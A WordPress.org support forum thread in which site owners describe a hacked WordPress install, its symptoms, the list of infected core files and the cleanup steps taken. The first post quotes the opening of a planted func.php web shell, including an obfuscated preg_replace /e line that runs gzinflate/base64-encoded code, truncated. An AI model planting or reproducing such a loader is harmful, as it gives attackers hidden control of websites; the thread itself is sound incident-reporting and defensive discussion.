WordPress.org

Ready to get started?Download WordPress

Forums

I Think a Hack Added func.php to My Theme Files (5 posts)

  1. melissadonovan
    Member
    Posted 2 years ago #

    I stuck my head under the hood of my website because Feedburner suddenly stopped recognizing my feed. As I was going through my php files to clean out the white space, I found an unfamiliar file: func.php

    The code is enormous but here's how it started:

    <?php
    $auth_pass = "8a4bf282852bf4c49e17f0951f645e72";
    $color = "#df5";
    $default_action = "FilesMan";
    $default_charset = "Windows-1251";
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAl

    I deleted the file but am still researching to see if anyone else has experienced this. I did notice the file seems to have been added on 8/31/11. My site has had numerous, sudden problems in the past week: feed stopped updating, extreme decrease in traffic, etc.

    Anyway, I'm worried this hack has added files or code elsewhere on my site (I do not understand the code in the func.php file at all).

    Has anyone seen this before? Any ideas about how to clean out any malicious code it has generated?

  2. Jackson
    Member
    Posted 2 years ago #

    Yikes, that doesn't look good.

    I would operate under the assumption that your site has been compromised and there may have been backdoors installed which will allow the attacker to return.

    Here's a good resource to start:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    A good tool for quickly identifying obvious malicious files left behind is Exploit Scanner, http://wordpress.org/extend/plugins/exploit-scanner/

    But you still really need to reinstall from clean backups to be safe.

  3. melissadonovan
    Member
    Posted 2 years ago #

    This turned out to be a hack. From what I have read, this hack adds back doors to all your domains and probably enters via a plugin. Yes, all of your domains. I thought I'd document some of my findings and solutions here in case anyone else has this problem.

    Here were the clues that something was wrong:

    -Feedburner feed stopped updating. Says feed invalid but feed validator says feed is fine. Nothing seemed to be wrong with the feed but Feedburner rejected it.
    -Sudden, severe drop in traffic. My traffic decreased by over 75%.
    -Rank on search engines decreased dramatically. In some cases from top three positions to page five or lower.
    -Obviously, lowered revenue as a result of traffic and search engine rank decreases

    Here are some of the signs of the hack:

    -The first sign was that nothing worked to fix my feed and there didn't appear to be anything wrong with it.
    -I found an unknown php file in my theme folder. The file was titled func.php. Details in my original post at the top of this thread.
    -I deleted that file immediately and changed all my passwords for any account or user that can access my sites.
    -Contacted my host to see if they could help. They sent me a list of files they found to have been hacked (I'll paste the list at the bottom of this post). These were all WordPress files in my index plus one plugin file. Note: I had already deleted several plugins, which may have also been hacked.
    -These findings applied to all my websites under one FTP user. Which was pretty scary.

    Here are the fixes (as best I can remember):

    -First, I changed all passwords that access WordPress, FTP, databases, etc.
    -Deactivate and delete ANY unnecessary plugins.
    -Via FTP, I found unfamiliar php files on my domains with names like Siegfried_allegra.php, _cat_hyacinthia.php, and also some quickstart.html files. I deleted all of these. They appear to be the back doors that hackers use to get in.
    -Next I removed the harmful code from all the php files for WordPress (see list of files below). This bad code was inserted at the beginning of those php files and looked a lot like the code snippet I pasted in the first post of this thread. Reloaded the fixed pages.
    -Finally, I reset all my passwords again.

    Then, I went to Feedburner and discovered that it now recognized my feed, which is a good sign, since that was the first alert that something was wrong.

    Here is the list of files that contained hack code:

    /wp-config.php
    /wp-rdf.php
    /wp-rss.php
    /wp-content/plugins/google-analytics-for-wordpress/press.php
    /wp-links-opml.php
    /wp-signup.php
    /wp-trackback.php
    /wp-load.php
    /wp-mail.php
    /wp-rss2.php
    /wp-comments-post.php
    /wp-activate.php
    /xmlrpc.php
    /wp-feed.php
    /wp-blog-header.php
    /index.php
    /wp-config-sample.php
    /wp-register.php
    /wp-atom.php
    /wp-cron.php
    /wp-commentsrss2.php
    /wp-pass.php
    /wp-app.php
    /wp-settings.php
    /wp-login.php

    If anyone else has this problem, I hope this helps.

  4. melissadonovan
    Member
    Posted 2 years ago #

    I wanted to add a few notes of interest about this hack:

    1. I ran the Google Webmasters malware detection and it did not find anything; however the Google search engine appears may have detected the malware because it penalized my rankings.

    2. Feed validator and XML validator did not recognize any malicious code but Feedburner most definitely did.

    Also, another red flag was that my crawl stats showed a drastic increase in crawl time (maybe this is what penalized my site with search engines). It looks like crawl time increased by over 300%.

  5. remino
    Member
    Posted 2 years ago #

    Just to let you know, my site was compromised too. A hacker uploaded a doc.php file in /wp-content/plugins/si-contact-form/captcha/temp, with which I assume the same hacker wrote the theme.php (not func.php for me) in /wp-content/themes/twentyeleven. After that, a separate spam WordPress site was installed in /wp-includes/js/saw, which was connected to an external database.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags